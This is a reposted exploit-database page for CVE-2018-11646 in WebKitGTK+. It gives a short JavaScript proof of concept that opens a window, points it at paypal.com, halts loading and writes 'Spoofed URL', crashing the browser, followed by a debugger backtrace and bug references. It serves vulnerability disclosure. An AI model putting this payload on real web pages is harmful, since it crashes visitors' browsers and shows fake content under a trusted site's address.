首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 WebKitGTK+ < 2.21.3 - Crash (PoC) 来源：vfocus.net 作者：Mishra 发布时间：2018-06-11   # Title: WebKitGTK+ < 2.21.3 - Crash (PoC) # Author: Dhiraj Mishra # Date: 2018-06-05 # Software: https://webkitgtk.org/ # CVE: CVE-2018-11646 # Summary: # webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in # UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, # mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.   # PoC:   <script> win = window.open("sleep_one_second.php", "WIN"); window.open("https://www.paypal.com", "WIN");  win.document.execCommand('Stop');              win.document.write("Spoofed URL");   win.document.close(); </script>     Backtrace using fedora 27:   #0 WTF::StringImpl::rawHash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508 #1 WTF::StringImpl::hasHash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514 #2 WTF::StringImpl::hash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525 #3 WTF::StringHash::hash at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73 #9 WTF::HashMap, WTF::HashTraits >::get at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406 #10 webkitFaviconDatabaseSetIconURLForPageURL at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193 #11 webkitFaviconDatabaseSetIconForPageURL at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318 #12 webkitWebViewSetIcon at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964 #13 WTF::Function::performCallbackWithReturnValue at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108 #15 WebKit::WebPageProxy::dataCallback at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083 #16 WebKit::WebPageProxy::finishedLoadingIcon at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848 #17 IPC::callMemberFunctionImpl::operator() at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68 #29 WTF::RunLoop::::_FUN(gpointer) at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70 #30 g_main_dispatch at gmain.c line 3148 #31 g_main_context_dispatch at gmain.c line 3813 #32 g_main_context_iterate at gmain.c line 3886 #33 g_main_context_iteration at gmain.c line 3947x #34 g_application_run at gapplication.c line 2401 #35 main at ../src/ephy-main.c line 432     # Reference's: # https://bugs.webkit.org/show_bug.cgi?id=186164 # https://bugzilla.gnome.org/show_bug.cgi?id=795740   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·10-Strike Network Scanner 3.0 ·PHP 7.2.2 - 'php_stream_url_wr ·10-Strike Network Inventory Ex ·Apple macOS Kernel - Use-After ·10-Strike Network Inventory Ex ·Apple macOS/iOS Kernel - Heap ·WebKit - not_number defineProp ·TrendMicro OfficeScan XG 11.0 ·Clone2GO Video converter 2.8.2 ·WebKit - WebAssembly Compilati ·Linux Kernel < 4.16.11 - 'ext4 ·Google Chrome - Integer Overfl   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved